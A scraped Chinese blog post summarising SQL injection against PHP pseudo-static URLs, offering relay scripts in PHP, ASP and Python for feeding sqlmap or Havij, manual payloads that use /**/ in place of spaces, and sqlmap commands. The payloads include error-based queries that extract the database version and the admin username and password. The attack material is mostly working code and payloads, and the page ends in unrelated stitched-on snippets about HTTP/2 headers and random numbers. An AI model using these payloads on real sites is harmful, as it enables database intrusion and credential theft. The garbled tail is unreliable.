- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章PHP针对伪静态的注入总结【附asp与Python相关代码】由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考,具体如下:
一:中转注入法 。
1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了 http://www.xxx.com/news.php/id/1.html 。
2.测试步骤:
中转注入的php代码:inject.php 。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
<?php
set_time_limit(0);
$id
=
$_GET
[
"id"
];
$id
=
str_replace
(” “,”%20″,
$id
);
$id
=
str_replace
(“=”,”%3D”,
$id
);
//$url = "http://www.xxx.com/news.php/id/$id.html";
$url
=
"http://www.xxx.com/news.php/id/$id.html"
;
//echo $url;
$ch
= curl_init();
curl_setopt(
$ch
, CURLOPT_URL,
"$url"
);
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(
$ch
, CURLOPT_HEADER, 0);
$output
= curl_exec(
$ch
);
curl_close(
$ch
);
print_r(
$output
);
?>
|
3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1 。
通过sqlmap或者havj可以跑注入漏洞.
附录ASP中转代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
|
<%
JmdcwName=request(
"id"
)
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl=
"http://192.168.235.7:8808/ad/blog/"
//实际上要请求的网址
JMUrl=JMUrl & JmStr&
".html"
//拼接url
response.write JMUrl&JmStr //我这里故意输出url来看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=
""
JmCok=replace(JmCok,chr(32),
"%20"
)
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段
Function
PostData(PostUrl,PostStr,PostCok,PostRef)
Dim
Http
Set
Http = Server.CreateObject(
"msxml2.serverXMLHTTP"
)
With
Http
.Open
"GET"
,PostUrl,
False
.Send ()
PostData = .ResponseBody
End
With
Set
Http =
Nothing
PostData =bytes2BSTR(PostData)
End
Function
Function
bytes2BSTR(vIn) //处理返回的信息
Dim
strReturn
Dim
I, ThisCharCode, NextCharCode
strReturn =
""
For
I = 1
To
LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If
ThisCharCode < &H80
Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(
CLng
(ThisCharCode) * &H100 +
CInt
(NextCharCode))
I = I + 1
End
If
Next
bytes2BSTR = strReturn
End
Function
Function
URLEncoding(vstrin) //发包前对参数的url编码一下
strReturn=
""
Dim
i
'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符
vstrin=Replace(vstrin,chr(32),
"/**/"
)
'在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的
For
i=1
To
Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF
Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If
InnerCode<0
Then
InnerCode=InnerCode + &H10000
End
If
Hight1=(InnerCode
And
&HFF00) \&HFF
Low1=InnerCode
And
&HFF
strReturn=strReturn &
"%"
& Hex(Hight1) &
"%"
& Hex(Low1)
End
if
Next
URLEncoding=strReturn
End
Function
%>
|
2、手工注入法 。
1.http://www.xxx.com/play/Diablo.html http://www.xxx.com/down/html/?772.html 。
2.测试注入:
http://www.xxx.com/down/html/?772′.html http://www.xxx.com /play/Diablo'.html http://www.xxx.com/play/Diablo'/**/and /**/1='1 /*.html http://www.xxx.com/play/Diablo' /**/and /**/1='2 /*.html http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常 http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错 。
3.看页面是否存在差异,相同则不存在,不同存在注入.
4.联合查询:
http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html 。
手工注入法(二) 。
http://www.xxx.net/news/html/?410.html http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html 。
注:
伪静态的注入和URL的普通GET注入不太相同 。
。普通url的get注入的%20,%23,+等都可以用;但是伪静态不行,会被直接传递到到url中,所以用/**/这个注释符号表示空格.
3、SQLmap方法 。
在sqlmap中伪静态哪儿存在注入点就加* http://www.cunlide.com/id1/1/id2/2 python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″ http://www.xxx.com/news/class/?103.htm python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html” 。
4、python脚本方法 。
代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
from
BaseHTTPServer
import
*
import
urllib2
class
MyHTTPHandler(BaseHTTPRequestHandler):
def
do_GET(
self
):
path
=
self
.path
path
=
path[path.find(
'id='
)
+
3
:]
proxy_support
=
urllib2.ProxyHandler({
"http"
:
"http://127.0.0.1:8087"
})
opener
=
urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
url
=
"http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
try
:
response
=
urllib2.urlopen(url
+
path)
html
=
response.read()
except
urllib2.URLError,e:
html
=
e.read()
self
.wfile.write(html)
server
=
HTTPServer(("",
8000
), MyHTTPHandler)
server.serve_forever()
|
希望本文所述对大家PHP程序设计有所帮助.
最后此篇关于PHP针对伪静态的注入总结【附asp与Python相关代码】的文章就讲到这里了,如果你想了解更多关于PHP针对伪静态的注入总结【附asp与Python相关代码】的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
如标题所示,我正在寻找有关伪/冒号 header 字段用途的一些信息,即我想知道为什么我们有第二种类型的 header 字段... 另外 - 我知道在 http2 中使用伪/冒号 header 字段代
(伪)多线程:借助外力 利用WEB服务器本身的多线程来处理,从WEB服务器多次调用我们需要实现多线程的程序。 QUOTE: 我们知道PHP本身是不支持多线程的, 但是我们的WEB服务器是支持多线程的
您如何在 HDL (verilog) 中实现硬件随机数生成器? 需要考虑哪些选项? 这个问题是在self-answer之后格式。鼓励添加答案和更新。 最佳答案 正如摩根的回答中所指出的,这只会产生一个
我写了这个CSS: div { width: 500px; height:150px; margin-left:150px; background: lightblue; } div:
这是我要解决的问题:从数据库A读取一个字符串,将该字符串转换为Date对象,将Date对象存储到数据库B中。 例)数据库A:从数据库A读入日期字符串“ 2015-03-08 02:00:00”,转换为
我想创建 std::fscanf() 的 sibling (我知道这是一个 C 函数)。所以,我的界面是这样的: template std::size_t ts_scanf(is, format,
运行 PostgreSQL 7.x(是的,我正在升级) 问题: 如果没有返回数据,我有三到四个字段需要设置。 正在考虑这样的事情 SELECT CASE WHEN default_fie
出于某种原因,我很难在 JS 中为我的游戏执行以下代码: 假设我们要求用户在棋盘上移动一个棋子。他们可以做的位置是位置A、位置B或位置C。每个位置一次只能容纳一件。否则为无效移动。 第一个用户决定
我已经毫无问题地编写了霍夫曼树的代码,但现在我希望在文件和树中添加伪 EOF,以便我知道何时停止从文件中读取。 我完全掌握了伪 EOF 的概念。我还了解到没有 ASCII 值 > 255 的字符。 我
给定一个按钮 ::after 当被触发时,伪 :after 类需要有一个类 search-active 切换,为按钮设置背景颜色 .primary .search:after, .primary
我想让第一行的文本像第二行一样缩进 (50px)。有什么办法吗?非常感谢! body{ counter-reset: h2counter; } h1{ counter-reset: h2counter
:before 或 :after 这样的伪元素是否可以从父元素的不同属性继承值? 在我的例子中,我有一个第三方组件设置其元素运行时的背景颜色...我需要继承该颜色并将其设置为伪元素的边框颜色。 最佳答
在并行循环中请求随机数总是返回相同的伪随机数。我怎样才能避免这种情况? % workers initialization: if matlabpool('size') == 0 matlabp
假设最大IP可以包含每个“点”括号中的最大数量999,即999.999.999.999 是最大的可用值。 我已经在计算器中检查了正则表达式 ([0-9]+.){3}[0-9]。那么,为什么程序抛出运行
我对随机数生成的概念非常陌生,我需要为用c编写的工作创建自己的算法(内置的随机数生成器对我不起作用)。 有人能给我介绍一个很好的主题,这样我就可以理解这个概念了吗?到目前为止,我所发现的一切似乎都是用
假设我有一个数字序列:{n, n+1, n+2, ... n+m} 在不提前存储数字的情况下,我想创建一个函数 f(),给定序列 {1,2,3,...m} 将以随机(或至少伪)的方式吐出原始集合随机)
什么是伪 tcp channel ,如何实现? 最佳答案 伪 TCP 是一种协议(protocol),它实现了 TCP 的一些思想,以通过不可靠的、基于数据包的接口(interface)提供可靠的数据
我正在尝试展开一些嵌套循环,以牺牲内存为代价(可能)获得更好的性能。在我的场景中,我最终会得到一个包含大约 3 亿个元素(元组)的列表,我必须以(或多或少)随机顺序产生这些元素。 在这个数量级上,ra
如何在 PHP 中生成(伪)随机字母数字字符串,例如:'d79jd8c'? 最佳答案 首先创建一个包含所有可能字符的字符串: $characters = 'abcdefghijklmnopqrstu
我有一段代码可以为玩家生成迷你任务。这很简单,要获得两个不同的点(起点和终点),我有一个如下所示的算法: std::vector missions; missions.push_bac
我是一名优秀的程序员,十分优秀!